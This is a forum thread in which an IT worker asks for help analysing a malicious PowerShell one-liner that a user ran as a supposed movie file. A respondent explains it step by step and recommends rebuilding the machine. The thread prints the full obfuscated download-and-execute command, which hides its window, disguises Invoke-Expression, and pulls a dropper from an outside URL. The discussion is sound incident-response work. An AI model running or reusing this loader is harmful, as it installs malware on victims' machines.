need help with identifying actions of a malicious code

Welcome Forums General PowerShell Q&A need help with identifying actions of a malicious code

  • This topic has 2 replies, 2 voices, and was last updated 1 year ago by
    Inactive
    .
Viewing 2 reply threads
  • Author
    Posts
    • #162461
      Inactive
      Topics: 2
      Replies: 1
      Points: 0
      Rank: Member

      I’m looking for clues here.  Long story short, one of our users ran what he thought was a movie file on his company laptop.  But the file isn’t a actually a movie but a Powershell script.  Well said he double-clicked on the “movie file” but nothing happened, but I suspect something did happen.

      Script is below:

      =====================
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy UnRestricted -Windo 1 $ag=[string][char[]]@(0x69,0x65,0x58) -replace ‘ ‘,”;sal s $ag;$nq=((New-Object Net.WebClient)).DownloadString(‘httpp://shortbit.xyz/psp’);s $nq

      ======================

      Could the experts chime in and tell me what this script does or attempt to do?  I did check on the URL “shortbit.xyz/psp” in the script and it points to a link to a text file.  I’m assuming it’s a text file that the script will use?

    • #162513
      Participant
      Topics: 1
      Replies: 302
      Points: 148
      Helping Hand
      Rank: Participant

      Let’s break it down:

      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy UnRestricted -Windo 1 

      This runs powershell.exe in a hidden Window with ExecutionPolicy set to UnRestricted, which allows unsigned scripts to be run.

      $ag=[string][char[]]@(0x69,0x65,0x58) -replace ' ',"

      This sets the variable $ag to ieX, which is an alias for the Invoke-Expression cmdlet.

      sal s $ag

      sal is an alias for Set-Alias.
      s is now an alias for Invoke-Expression

      $nq=((New-Object Net.WebClient)).DownloadString('[removed]')

      This sets the $nq variable to the content of the text file.

      s $nq

      This runs Invoke-Expression against the text that was previously downloaded.

      Without knowing the content of the text file it’s not possible to tell what happened next. My guess would be it’s some kind of dropper for malware, possibly ransomware.

      You should consider the machine compromised, remove it from the network and rebuild it.

    • #162519
      Inactive
      Topics: 2
      Replies: 1
      Points: 0
      Rank: Member

      Thanks for the explanation.  You were right, the “text file” is a dropper trojan.  I’ve directed user to do a complete antivirus scan of his C: drive and it detected the text file as a dropper trojan.

Viewing 2 reply threads
  • The topic ‘need help with identifying actions of a malicious code’ is closed to new replies.